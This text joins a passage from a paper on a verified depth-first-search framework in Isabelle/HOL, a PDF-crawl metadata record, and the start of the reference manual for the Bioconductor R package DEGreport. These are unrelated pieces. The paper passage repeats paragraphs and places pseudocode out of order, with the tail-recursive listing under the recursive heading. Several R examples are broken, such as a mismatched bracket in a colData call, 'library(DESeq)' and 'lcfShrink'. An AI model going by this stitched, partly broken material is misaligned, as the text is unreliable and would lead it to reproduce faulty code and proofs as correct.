It is trivial to show that these refine their abstract counterparts w.r.t. RS. Once this is done, the DFS framework gives us a cyclicity checker over the concrete state, and a refinement theorem:
```plaintext
cycc_impl ≤⇓ RS cycc
```
7.2 Structural Refinement
Another aspect of refinement is the structure of the algorithm. Up to now, we have represented the algorithm as a while-loop over a step-function. This representation greatly simplifies the proof architecture, however, it is not how one would implement a concrete DFS algorithm. We provide two standard implementations: A tail-recursive one and a recursive one. The tail-recursive implementation uses only while and foreach loops, maintaining the stack explicitly, while the recursive implementation uses a recursive function and requires no explicit stack.
We are interested in making the structural refinement of the algorithm independent of the projection, such that we can combine different structural refinements with different projections, without doing a quadratic number of refinement proofs. For this purpose we formalize the structural refinements in the generic setting (cf. Section §6) first. Depending on the desired structure, we have to add some minimal assumptions on the state and generic operations, as will be detailed below. The resulting generic algorithms are then instantiated by the concrete state and operations from the projection phase, thereby discharging the additional assumptions.
The following listing depicts the pseudocode for the tail-recursive implementation, using the basic DFS operations:
4 This is an optimization that saves one membership query per node.
5 For example, checking the loop condition would require iteration over all root nodes each time.
As in the tail-recursive implementation, we iterate over all root nodes. For each root node, it calls new_root and then executes steps of the original algorithm until the stack is empty again. Note that we effectively replace the arbitrary choice of the next root node by the outer foreach-loop. In order for this implementation to be a refinement of the original algorithm, we have to assume that 1) the stack is initially empty, such that we can start with choosing a root node, and 2) the same root node cannot be chosen twice, so that we are actually finished when we have iterated over all root nodes. In order to ensure 2), we assume that new_root sets the node to discovered, and no operation can decrease the set of discovered nodes.
With these assumptions, we can use the infrastructure of the Isabelle Refinement Framework to show that the algorithm tailrec_DFS refines the original DFS.
The next listing depicts the pseudocode for the recursive implementation:
```plaintext
tailrec_DFS:
init; on_init
foreach v0 in V0 do
if is_break then break
if not discovered v0 then
new_root v0; on_new_root v0
while (stack ≠ ⦞ ∧ ¬ is_break) do
(a, V) = get_pending
case V of
None ⇒ finish u; on_finish u
Some v ⇒ {
if discovered v then
if finished v then
cross_edge u v; on_cross_edge u v
else
back_edge u v; on_back_edge u v
else
discover u v; on_discover u v
}
This implementation iterates over all root nodes. For each root node, it calls new_root and then executes steps of the original algorithm until the stack is empty again. Note that we effectively replace the arbitrary choice of the next root node by the outer foreach-loop. In order for this implementation to be a refinement of the original algorithm, we have to assume that 1) the stack is initially empty, such that we can start with choosing a root node, and 2) the same root node cannot be chosen twice, so that we are actually finished when we have iterated over all root nodes. In order to ensure 2), we assume that new_root sets the node to discovered, and no operation can decrease the set of discovered nodes.
With these assumptions, we can use the infrastructure of the Isabelle Refinement Framework to show that the algorithm tailrec_DFS refines the original DFS.
The next listing depicts the pseudocode for the recursive implementation:
```plaintext
recursive_DFS:
init; on_init
foreach v0 in V0 do
if is_break then break
if not discovered v0 then
new_root v0; on_new_root v0
inner_dfs v0
inner_dfs u:
foreach v in E \ {u} do {
if is_break then break
choose_pending u (Some v)
if discovered v then
cross_edge u v; on_cross_edge u v
else
back_edge u v; on_back_edge u v
else
discover u v; on_discover u v
if ¬ is_break then inner_dfs u
}
choose_pending u None;
finish u; on_finish u
```
As in the tail-recursive implementation, we iterate over all root nodes. For each root node, we call the recursive function inner_dfs. Intuitively, this function handles a newly discovered node: It iterates over its successors, and for each successor, it decides whether it induces a cross or back edge, or leads to a newly discovered node. In the latter case, inner_dfs is called recursively on this newly discovered node. Finally, if all successor nodes have been processed, the node is finished.
Intuitively, this implementation replaces the explicit stack of the original algorithm by recursion.
Apart from the assumptions 1) and 2) from tailrec_DFS, we need some additional assumptions to show that this implementation refines the original algorithm: 3) The operation new_root v0 initializes the stack to only contain v0, and the pending edges to all outgoing edges of v0; the operation discover u pushes u on the stack and adds its outgoing edges to the set of pending edges; the finish-operation pops the topmost node from the stack. 4) The get_pending-operation of the original algorithm must have the form of selecting a pending edge from the top of the stack, if any, and then calling the operation choose_pending for this edge, where choose_pending removes the edge from the set of pending edges.
With these assumptions we show that recursive_DFS refines the original DFS algorithm. Note that the refinement proof requires the state to contain a stack, which is however not used by the recursive algorithm. Provided that the parameterization does not require a stack either, we can add an additional data refinement step to remove the stack. For convenience, we combine this step with the automatic refinement to efficient data structures, which is described below.
Note that these assumptions are natural for any set of operations on a DFS state. The advantage of this formulation is its independence from the actual operations. Thus, the same formalization can be used to derive implementations for all states and corresponding operations, which reduces redundancies, and even makes proofs more tractable, as it abstracts from the details of a concrete data structure to its essential properties.
Example 7.2. Recall the simple state from Example [7.1]. The simple implementation satisfies all assumptions required for the tail-recursive and recursive implementation, independent of the parameterization. Thus, upon refining an algorithm to simple_state, we automatically get a tail-recursive and a recursive implementation, together with their refinement theorems. In case of the cyclicity checker, we get:
\[ \text{cycc_tr_impl} \leq \Downarrow \text{cycc} \quad \text{and} \quad \text{cycc_rec_impl} \leq \Downarrow \text{cycc} \]
### 7.3 Code Generation
After projection and structural refinement have been done, the algorithm is still described in terms of quite abstract data structures like sets and lists. In a last refinement step, these are refined to efficiently executable data structures, like hash-tables and array-lists. To this end, the Isabelle Collections Framework [10] provides a large library of efficient data structures and generic algorithms, and the Autoref-tool [2] provides a mechanism to automatically synthesize an efficient implementation and a refinement theorem, guided by user-configurable heuristics.
Note that we do this last refinement step only after we have fully instantiated the DFS-scheme. This has the advantage that we can choose the most adequate data structures for the actual algorithm. The fact that the refinements for the basic DFS operations are performed redundantly for each actual algorithm does not result in larger formalizations, as it is done automatically.
Example 7.3. In order to generate an executable cyclicity checker, we start with the constant cycc_tr_impl, which is the tail-recursive version of the cyclicity checker, using the simple_state (cf. Example [7.2]). The state consists of a stack, an on-stack set, a visited set, and the cyc_flag. Based on this, we define the cyclicity checker by
\[ \text{cycc_checker} E V0; \]
\[ s = \text{cycc_tr_impl} E V0; \]
\[ \text{return} (\text{cyc} s). \]
To generate executable code, we first have to write a few lines of canonical boilerplate to set up Autoref to work with the extension state of the cyclicity checker. The executable version of the algorithm is then synthesized by the following Isabelle commands:
\texttt{\textbf{schematic\_lemma} cycc\_impl:}
\texttt{\textbf{fixes} V0::'v::\textit{hashable\_set} \textbf{and} E::('v\times'v)\textit{set}
\textbf{defines} V \equiv Id :: ('v \times 'v)\textbf{set}
\textbf{assumes} \texttt{[unfolded V\_def,autoref\_rules]:}
\texttt{(succi,E)\in(V)\textit{slg\_rel}
(V0,V0)\in(V)\textit{list\_set\_rel}
\textbf{notes} \texttt{[unfolded V\_def,autoref\_tyref] =}
\texttt{TYREL/\textit{where} R=(V)\textit{dfst\_abs\_rel}
TYREL/\textit{where} R=(V \times (V)\textit{list\_set\_rel})\textit{ras\_rel}
\textbf{shows} nres\_of \texttt{(\textit{case}:'v\textit{dres}) \subseteq\subseteq\subseteq R \textit{cycc\_checker} E V0)
\texttt{unfolding cycc\_tr\_impl\_def[abs\_def] cycc\_checker\_def
\textbf{by autoref\_monadic}
\textbf{concrete\_definition} cycc\_exec\textbf{ uses} cycc\_impl
\textbf{export\_code} cycc\_exec\textbf{ in} SML
}
The first command uses the Autoref-tool to synthesize a refinement. The \texttt{fixes} line declares the types of the abstract parameters, restricting the node-type to be of the \textit{hashable} typclass. The next line defines a shortcut for the implementation relation for nodes, which is fixed to identity here. The assumptions declare the refinement of the abstract to the concrete parameters: The edges are implemented by a successor function, using the relator \textit{slg\_rel}, which is provided by the CAVA automata library [8]. The set of start nodes are implemented by a duplication-free list, using the relator \textit{list\_set\_rel} from the Isabelle Collections Framework, which is roughly the same as \textit{ls\_rel} from Example 5.3.
Finally, the \texttt{notes}-part gives some hints to the heuristics: The first hint causes sets of nodes to be implemented by hash-tables. This hint matches the on-stack and visited fields of the state. The second hint matches the stack field, and causes it to be implemented by an array-list, where the sets of pending nodes are implemented by duplication-free lists of their elements. Again, the required datatypes and their relators \textit{dfst\_abs\_rel} and \textit{ras\_rel} are provided by the Isabelle Collections Framework.
Ultimately, the \texttt{autoref\_monadic} method generates a refinement theorem of the shape indicated by the \texttt{show}-part, where \texttt{?c} is replaced by the concrete algorithm, and \texttt{?R} is replaced by the refinement relation for the result. The second command defines a new constant for the synthesized algorithm, and also provides a refinement theorem with the constant folded. As the generated algorithm only uses executable data structures, the code generator of Isabelle/HOL [9] can be used to generate efficient Standard ML code.
8. Conclusion and Future Work
In this paper, we have presented a framework that supports a step-wise refinement development approach of DFS-based algorithms. On the abstract level, we have a generic formalization of DFS, which is parameterized by hook functions that operate on an opaque extension state. Properties of the algorithm are proved via invariants.
To establish new invariants, only their preservation by the hook functions has to be shown. Moreover, invariants can be established incrementally, i.e., already proven invariants can be used when establishing new ones. To this end, our framework provides a large library of parametrization-independent standard invariants, which greatly simplify the correctness proofs of actual instantiations of the framework. For example, the cyclicity checker (cf. Example 4.1) required only one additional invariant with a straightforward 3-line proof.
Furthermore, the framework allows to refine both, data-structures and algorithm-structure, where the latter is (in general) independent of the actual instantiation. The data-refinement, as shown in this paper, is the prerequisite for the aforementioned library of invariants, as it allows to project a detailed abstract state to a small concrete state. This way, it is possible to have proof-supporting information without the necessity to actually gather it at runtime.
The framework supports various default concrete states. Using them only requires a refinement proof of the hook-functions.
To show the usability of the presented framework, we have formalized several examples from easy (Cyclicity Checker) to more advanced (Tarjan’s SCC algorithm). In this paper, we presented the development of the Cyclicity Checker and the approach for formalizing a nested DFS algorithm.
The main contribution of this paper is the DFS-framework itself, and its design approach, which is not limited to DFS algorithms. The first general design principle is the technique of incrementally establishing invariants, which allows us to provide a standard library of invariants, which are independent of the actual instantiation. In Isabelle/HOL, this technique is elegantly implemented via locales.
The second general principle is to provide an algorithm over a detailed state at the abstract level, and then use refinement to project away the unused parts of the state for the implementation. This allows us to have a common abstract base for all instantiations.
Finally, we provide different implementation styles for the same algorithm, in a way that is independent of the concrete data structures, only making some basic assumptions. This allows us to decouple the data refinement and the structural refinement.
8.1 Future Work
An interesting direction of future work is to extend the framework to more general classes of algorithms. For example, when dropping the restriction that pending edges need to come from the top of the stack, one gets a general class of search algorithms, also including breadth-first search, and best-first search.
Currently, our framework only supports an invariant-based proof style. However, in many textbooks, proofs about DFS algorithms are presented by arguing over the already completed search forest. This proof style can be integrated in our framework by (conceptually) splitting the DFS algorithm into two phases: The first phase creates the DFS forest, only using the base state, while the second phase recurses over the created forest and executes the hook functions. It remains future work to elaborate this approach and explore whether it results in more elegant proofs.
References
|
{"Source-Url": "http://www21.in.tum.de/~lammich/pub/cpp2015_dfs.pdf", "len_cl100k_base": 14859, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 37045, "total-output-tokens": 17200, "length": "2e13", "weborganizer": {"__label__adult": 0.0004360675811767578, "__label__art_design": 0.0005140304565429688, "__label__crime_law": 0.0004987716674804688, "__label__education_jobs": 0.0010175704956054688, "__label__entertainment": 9.465217590332033e-05, "__label__fashion_beauty": 0.00022268295288085935, "__label__finance_business": 0.0002875328063964844, "__label__food_dining": 0.00045013427734375, "__label__games": 0.001415252685546875, "__label__hardware": 0.0011119842529296875, "__label__health": 0.0007672309875488281, "__label__history": 0.0004298686981201172, "__label__home_hobbies": 0.00015175342559814453, "__label__industrial": 0.0006837844848632812, "__label__literature": 0.00040221214294433594, "__label__politics": 0.00042557716369628906, "__label__religion": 0.0007042884826660156, "__label__science_tech": 0.0718994140625, "__label__social_life": 0.00010377168655395508, "__label__software": 0.005970001220703125, "__label__software_dev": 0.91064453125, "__label__sports_fitness": 0.0004394054412841797, "__label__transportation": 0.0008854866027832031, "__label__travel": 0.00027251243591308594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 63058, 0.00793]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 63058, 0.45488]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 63058, 0.82638]], "google_gemma-3-12b-it_contains_pii": [[0, 4970, false], [4970, 11432, null], [11432, 18915, null], [18915, 27155, null], [27155, 33995, null], [33995, 39806, null], [39806, 46319, null], [46319, 53398, null], [53398, 61175, null], [61175, 63058, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4970, true], [4970, 11432, null], [11432, 18915, null], [18915, 27155, null], [27155, 33995, null], [33995, 39806, null], [39806, 46319, null], [46319, 53398, null], [53398, 61175, null], [61175, 63058, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 63058, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 63058, null]], "pdf_page_numbers": [[0, 4970, 1], [4970, 11432, 2], [11432, 18915, 3], [18915, 27155, 4], [27155, 33995, 5], [33995, 39806, 6], [39806, 46319, 7], [46319, 53398, 8], [53398, 61175, 9], [61175, 63058, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 63058, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
46f542cd583355431431895c3ff5c6f086610979
|
Package ‘DEGreport’
April 3, 2024
Version 1.38.5
Date 2023-12-06
Type Package
Title Report of DEG analysis
Description Creation of a HTML report of differential expression analyses of count data. It integrates some of the code mentioned in DESeq2 and edgeR vignettes, and report a ranked list of genes according to the fold changes mean and variability for each selected gene.
biocViews DifferentialExpression, Visualization, RNASeq, ReportWriting, GeneExpression, ImmunoOncology
URL http://lpantano.github.io/DEGreport/
BugReports https://github.com/lpantano/DEGreport/issues
Suggests BiocStyle, AnnotationDbi, limma, pheatmap, rmarkdown, statmod, testthat
Depends R (>= 4.0.0)
Imports utils, methods, Biobase, BiocGenerics, broom, circlize, ComplexHeatmap, cowplot, ConsensusClusterPlus, cluster, dendextend, DESeq2, dplyr, edgeR, ggplot2, gg dendro, grid, ggrepel, grDevices, knitr, logging, magrittr, psych, RColorBrewer, reshape, rlang, scales, stats, stringr, stringi, S4Vectors, SummarizedExperiment, tidyr, tibble
Maintainer Lorena Pantano <lorena.pantano@gmail.com>
License MIT + file LICENSE
VignetteBuilder knitr
RoxygenNote 7.2.3
Encoding UTF-8
Roxygen list(markdown = TRUE)
git_url https://git.bioconductor.org/packages/DEGreport
git_branch RELEASE_3_18
git_last_commit 672d8e5
git_last_commit_date 2023-12-06
Repository Bioconductor 3.18
Date/Publication 2024-04-03
Author Lorena Pantano [aut, cre],
John Hutchinson [ctb],
Victor Barrera [ctb],
Mary Piper [ctb],
Radhika Khetani [ctb],
Kenneth Daily [ctb],
Thanneer Malai Perumal [ctb],
Rory Kirchner [ctb],
Michael Steinbaugh [ctb]
R topics documented:
DEGreport-package .................................................. 3
createReport .......................................................... 4
deg ................................................................. 4
degCheckFactors .................................................... 5
degColors ............................................................ 6
degComps ........................................................... 7
degCorCov ........................................................... 8
degCovariates ....................................................... 9
degDefault .......................................................... 11
degFilter ............................................................. 12
degMA ............................................................... 13
degMB ............................................................... 14
degMDS ............................................................. 15
degMean ............................................................ 15
degMerge .......................................................... 16
degMV .............................................................. 17
degObj ............................................................. 18
degPatterns ........................................................ 19
degPCA ............................................................ 21
degPlot ............................................................. 22
degPlotCluster ..................................................... 24
degPlotWide ......................................................... 25
degQC ............................................................... 26
degResults ........................................................ 27
DEGSet ............................................................. 28
degSignature ....................................................... 30
degSummary ........................................................ 31
degVar .............................................................. 32
degVB ............................................................... 33
degVolcano ........................................................ 33
Description
These functions are provided for compatibility with older versions of DEGreport only and will be defunct at the next release.
Details
The following functions are deprecated and will be made defunct; use the replacement indicated below:
- `degRank`, `degPR`, `degBIcmd`, `degBI`, `degFC`, `degComb`, `degNcomb`: `DESeq2::lcfShrink`. This function was trying to avoid big FoldChange in variable genes. There are other methods nowadays like `lcfShrink` function. DEGreport
Author(s)
Maintainer: Lorena Pantano <lorena.pantano@gmail.com>
Other contributors:
- John Hutchinson [contributor]
- Victor Barrera [contributor]
- Mary Piper [contributor]
- Radhika Khetani [contributor]
- Kenneth Daily [contributor]
- Thanneer Malai Perumal [contributor]
- Rory Kirchner [contributor]
- Michael Steinbaugh [contributor]
See Also
Useful links:
createReport
Create report of RNAseq DEG analysis
Description
This function get the count matrix, pvalues, and FC of a DEG analysis and create a report to help to detect possible problems with the data.
Usage
createReport(g, counts, tags, pvalues, path, pop = 400, name = "DEGreport")
Arguments
- **g**: Character vector with the group the samples belong to.
- **counts**: Matrix with counts for each samples and each gene. Should be same length than pvalues vector.
- **tags**: Genes of DEG analysis
- **pvalues**: pvalues of DEG analysis
- **path**: path to save the figure
- **pop**: random genes for background
- **name**: name of the html file
Value
A HTML file with all figures and tables
deg
Method to get all table stored for an specific comparison
Description
Method to get all table stored for an specific comparison
Usage
deg(object, value = NULL, tidy = NULL, top = NULL, ...)
## S4 method for signature 'DEGSet'
deg(object, value = NULL, tidy = NULL, top = NULL, ...)
degCheckFactors
Arguments
- **object**: DEGSet
- **value**: Character to specify which table to use.
- **tidy**: Return data.frame, tibble or original class.
- **top**: Limit number of rows to return. Default: All.
- **...**: Other parameters to pass for other methods.
Author(s)
Lorena Pantano
References
- Testing if top is whole number or not comes from: https://stackoverflow.com/a/3477158
degCheckFactors Distribution of gene ratios used to calculate Size Factors.
Description
This function check the median ratio normalization used by DESeq2 and similarly by edgeR to visually check whether the median is the best size factor to represent depth.
Usage
degCheckFactors(counts, each = FALSE)
Arguments
- **counts**: Matrix with counts for each samples and each gene. row number should be the same length than pvalues vector.
- **each**: Plot each sample separately.
Details
This function will plot the gene ratios for each sample. To calculate the ratios, it follows the similar logic than DESeq2/edgeR uses, where the expression of each gene is divided by the mean expression of that gene. The distribution of the ratios should approximate to a normal shape and the factors should be similar to the median of distributions. If some samples show different distribution, the factor may be bias due to some biological or technical factor.
Value
ggplot2 object
References
- Code to calculate size factors comes from `DESeq2::estimateSizeFactorsForMatrix()`.
Examples
```r
data(humanGender)
library(SummarizedExperiment)
degCheckFactors(assays(humanGender)[[1]][, 1:10])
```
---
**degColors**
*Make nice colors for metadata*
Description
The function will take a metadata table and use Set2 palette when number of levels is > 3 or a set of orange/blue colors otherwise.
Usage
```r
degColors(
ann,
col_fun = FALSE,
con_values = c("grey80", "black"),
cat_values = c("orange", "steelblue"),
palette = "Set2"
)
```
Arguments
- `ann` : Data.frame with metadata information. Each column will be used to generate a palette suitable for the values in there.
- `col_fun` : Whether to return a function for continuous variables (compatible with `ComplexHeatmap::HeatmapAnnotation()`) or the colors themselves (compatible with `pheatmap::pheatmap()`).
- `con_values` : Color to be used for continuous variables.
- `cat_values` : Color to be used for 2-levels categorical variables.
- `palette` : Palette to use from `brewer.pal()` for multi-level categorical variables.
Examples
```r
data(humanGender)
library(DESeq2)
library(ComplexHeatmap)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:10, idx], colData(humanGender)[idx,], design=~group)
```
degComps
th <- HeatmapAnnotation(df = colData(dse),
col = degColors(colData(dse), TRUE))
Heatmap(log2(counts(dse)+0.5), top_annotation = th)
custom <- degColors(colData(dse), TRUE,
con_values = c("white", "red"),
cat_values = c("white", "black"),
palette = "Set1")
th <- HeatmapAnnotation(df = colData(dse),
col = custom)
Heatmap(log2(counts(dse)+0.5), top_annotation = th)
degComps Automatize the use of results() for multiple comparisons
Description
This function will extract the output of DESeq2::results() and DESeq2::lfcShrink() for multiple comparison using:
Usage
degComps(
dds,
combs = NULL,
contrast = NULL,
alpha = 0.05,
skip = FALSE,
type = "normal",
pairs = FALSE,
fdr = "default"
)
Arguments
dds DESeq2::DESeqDataSet object.
combs Optional vector indicating the coefficients or columns from colData(dds) to create group comparisons.
contrast Optional vector to specify contrast. See DESeq2::results().
alpha Numeric value used in independent filtering in DESeq2::results().
skip Boolean to indicate whether skip shrinkage. For instance when it comes from LRT method.
type Type of shrinkage estimator. See DESeq2::lfcShrink().
pairs Boolean to indicate whether create all comparisons or only use the coefficient already created from DESeq2::resultsNames().
fdr type of fdr correction. default is FDR value, lfdr-stat is for local FDR using the statistics of the test, lfdr-pvalue is for local FDR using the p-value of the test. fdrtools needs to be installed and loaded by the user.
Details
- coefficients
- contrast
- Multiple columns in colData that match coefficients
- Multiple columns in colData to create all possible contrasts
Value
DEGSet with unSrunken and Srunken results.
Author(s)
Lorena Pantano
Examples
library(DESeq)
dds <- makeExampleDESeqDataSet(betaSD=1)
colData(dds)[["condition"]]<- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
dds <- DESeq(dds)
res <- degComps(dds, combs = c("condition", 2),
contrast = list("treatment_B_vs_A", c("condition", "A", "B")))
# library(fdrtools)
#res <- degComps(dds,contrast = list("treatment_B_vs_A"),
# fdr="lfdr-stat")
degCorCov
Calculate the correlation relationship among all covariates in the metadata table
Description
This function will calculate the correlation among all columns in the metadata
Usage
degCorCov(metadata, fdr = 0.05, use_pval = FALSE, ...)
Arguments
- metadata: data.frame with samples metadata.
- fdr: numeric value to use as cutoff to determine the minimum fdr to consider significant correlations between pcs and covariates.
- use_pval: boolean to indicate to use p-value instead of FDR to hide non-significant correlation.
- ...: Parameters to pass to ComplexHeatmap::Heatmap().
Value
: list:
a) cor, data.frame with pair-wise correlations, pvalues, FDR
b) corMat, data.frame with correlation matrix
c) fdrMat, data.frame with FDR matrix
b) plot, Heatmap plot of correlation matrix
Author(s)
: Lorena Pantano, Kenneth Daily and Thanneer Malai Perumal
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
cor <- degCorCov(colData(dse))
degCovariates Find correlation between pcs and covariates
Description
This function will calculate the pcs using prcomp function, and correlate categorical and numerical variables from metadata. The size of the dots indicates the importance of the metadata, for instance, when the range of the values is pretty small (from 0.001 to 0.002 in ribosomal content), the correlation results is not important. If black stroke lines are shown, the correlation analysis has a FDR < 0.05 for that variable and PC. Only significant variables according the linear model are colored. See details to know how this is calculated.
Usage
degCovariates(
counts,
metadata,
fdr = 0.1,
scale = FALSE,
minPC = 5,
correlation = "kendall",
addCovDen = TRUE,
legacy = FALSE,
smart = TRUE,
method = "lm",
plot = TRUE
)
Arguments
Counts
- counts: normalized counts matrix
- metadata: data.frame with samples metadata.
- fdr: numeric value to use as cutoff to determine the minimum fdr to consider significant correlations between pcs and covariates.
- scale: boolean to determine whether counts matrix should be scaled for pca. default FALSE.
- minPC: numeric value that will be used as cutoff to select only pcs that explain more variability than this.
- correlation: character determining the method for the correlation between pcs and covariates.
- addCovDen: boolean. Whether to add the covariates dendrogram to the plot to see covariates relationship. It will show degCorCov() dendrogram on top of the columns of the heatmap.
- legacy: boolean. Whether to plot the legacy version.
- smart: boolean. Whether to avoid normalization of the numeric covariates when calculating importance. This is not used if legacy = TRUE. See @details for more information.
- method: character. Whether to use lm to calculate the significance of the covariates effect on the PCs. For that, this function uses lm to regress the data and uses the p-value calculated by each variable in the model to define significance (p-value < 0.05). Variables with a black stroke are significant after this step. Variables with grey stroke are significant at the first pass considering p.value < 0.05 for the correlation analysis.
- plot: Whether to plot or not the correlation matrix.
Details
This method is adapted from Daily et al 2017 article. Principal components from PCA analysis are correlated with covariates metadata. Factors are transformed to numeric variables. Correlation is measured by cor.test function with Kendall method by default.
The size of the dot, or importance, indicates the importance of the covariate based on the range of the values. Covariates where the range is very small (like a % of mapped reads that varies between 0.001 to 0.002) will have a very small size (0.1*max_size). The maximum value is set to 5 units. To get to importance, each covariate is normalized using this equation: \(1 - \min(v/\max(v))\), and the minimum and maximum values are set to 0.01 and 1 respectively. For instance, 0.5 would mean there is at least 50% of difference between the minimum value and the maximum value. Categorical variables are plot using the maximum size always, since it is not possible to estimate the variability. By default, it won’t do \(v/\max(v)\) if the values are already between 0-1 or 0-100 (already normalized values as rates and percentages). If you want to ignore the importance, use legacy = TRUE.
Finally, a linear model is used to calculate the significance of the covariates effect on the PCs. For that, this function uses lm to regress the data and uses the p-value calculated by each variable in the model to define significance (p-value < 0.05). Variables with a black stroke are significant after this step. Variables with grey stroke are significant at the first pass considering p.value < 0.05 for the correlation analysis.
Value
: list:
degDefault
- plot, heatmap showing the significance of the variables.
- corMatrix, correlation, p-value, FDR values for each covariate and PCA pais
- pcsMatrix: PCs loading for each sample
- scatterPlot: plot for each significant covariate and the PC values.
- significants: contains the significant covariates using a linear model to predict the coefficient of covariates that have some color in the plot. All the significant covariates from the linear model analysis are returned.
Author(s)
: Lorena Pantano, Victor Barrera, Kenneth Daily and Thanneer Malai Perumal
References
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,, design=group)
res <- degCovariates(log2(counts(dse)+0.5), colData(dse))
res <- degCovariates(log2(counts(dse)+0.5),
colData(dse), legacy = TRUE)
res$plot
res$scatterPlot[[1]]
degDefault Method to get the default table to use.
Description
It can accept a list of new padj values matching the same dimmensions than the current vector.
Usage
degDefault(object)
degCorrect(object, fdr)
## S4 method for signature 'DEGSet'
degDefault(object)
## S4 method for signature 'DEGSet'
degCorrect(object, fdr)
degFilter
Arguments
- **object**: DEGSet
- **fdr**: It can be `fdr-stat`, `fdr-pvalue`, vector of new `padj`
Author(s)
Lorena Pantano
Examples
```r
library(DESeq2)
library(dplyr)
dds <- makeExampleDESeqDataSet(betaSD=1)
colData(dds)[["treatment"]]<- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
dds <- DESeq(dds)
res <- degComps(dds, contrast = list("treatment_B_vs_A"))
```
Description
This function will keep only rows that have a minimum counts of 1 at least in a `min` number of samples (default 80%).
Usage
```r
degFilter(counts, metadata, group, min = 0.8, minreads = 0)
```
Arguments
- **counts**: Matrix with expression data, columns are samples and rows are genes or other feature.
- **metadata**: Data.frame with information about each column in counts matrix. Rownames should match colnames(counts).
- **group**: Character column in metadata used to group samples and applied the cutoff.
- **min**: Percentage value indicating the minimum number of samples in each group that should have more than 0 in count matrix.
- **minreads**: Integer minimum number of reads to consider a feature expressed.
Value
- count matrix after filtering genes (features) with not enough expression in any group.
Examples
```r
data(humanGender)
library(SummarizedExperiment)
idx <- c(1:10, 75:85)
c <- degFilter(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], "group", min=1)
```
Description
MA-plot adaptation to show the shrinking effect.
Usage
```r
degMA(
results,
title = NULL,
label_points = NULL,
label_column = "symbol",
limit = NULL,
diff = 5,
raw = FALSE,
correlation = FALSE
)
```
Arguments
- **results**: DEGSet class.
- **title**: Optional. Plot title.
- **label_points**: Optionally label these particular points.
- **label_column**: Match label_points to this column in the results.
- **limit**: Absolute maximum to plot on the log2FoldChange.
- **diff**: Minimum difference between logFoldChange before and after shrinking.
- **raw**: Whether to plot just the unshrunken log2FC.
- **correlation**: Whether to plot the correlation of the two logFCs.
Value
MA-plot ggplot.
Examples
library(DESeq2)
dds <- makeExampleDESeqDataSet(betaSD=1)
dds <- DESeq(dds)
res <- degComps(dds, contrast = list("condition_B_vs_A"))
degMA(res)
degMB
Distribution of expression of DE genes compared to the background
Description
Distribution of expression of DE genes compared to the background
Usage
degMB(tags, group, counts, pop = 400)
Arguments
tagsex List of genes that are DE.
group Character vector with group name for each sample in the same order than counts
column names.
counts Matrix with counts for each sample and each gene Should be same length than
pvalues vector.
pop number of random samples taken for background comparison
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degMB(row.names(res)[1:20], colData(dds)["group"],
counts(dds, normalized = TRUE))
degMDS
*Plot MDS from normalized count data*
**Description**
Uses cmdscale to get multidimensional scaling of data matrix, and plot the samples with ggplot2.
**Usage**
```r
degMDS(counts, condition = NULL, k = 2, d = "euclidian", xi = 1, yi = 2)
```
**Arguments**
- `counts` matrix samples in columns, features in rows
- `condition` vector define groups of samples in counts. It has to be same order than the count matrix for columns.
- `k` integer number of dimensions to get
- `d` type of distance to use, c("euclidian", "cor").
- `xi` number of component to plot in x-axis
- `yi` number of component to plot in y-axis
**Value**
`ggplot2` object
**Examples**
```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
degMDS(counts(dse), condition = colData(dse)[["group"]])
```
degMean
*Distribution of pvalues by expression range*
**Description**
This function plot the p-values distribution colored by the quantiles of the average count data.
**Usage**
```r
degMean(pvalues, counts)
```
**degMerge**
Integrate data coming from degPattern into one data object
**Description**
The simplest case is if you want to combine the pattern profile for gene expression data and proteomic data. It will use the first element as the base for the integration. Then, it will loop through clusters and run `degPatterns` in the second data set to detect patterns that match this one.
**Usage**
```r
degMerge(
matrix_list,
cluster_list,
metadata_list,
summarize = "group",
time = "time",
col = "condition",
scale = TRUE,
mapping = NULL
)
```
**Arguments**
- `matrix_list`: list expression data for each element
- `cluster_list`: list df item from degPattern output
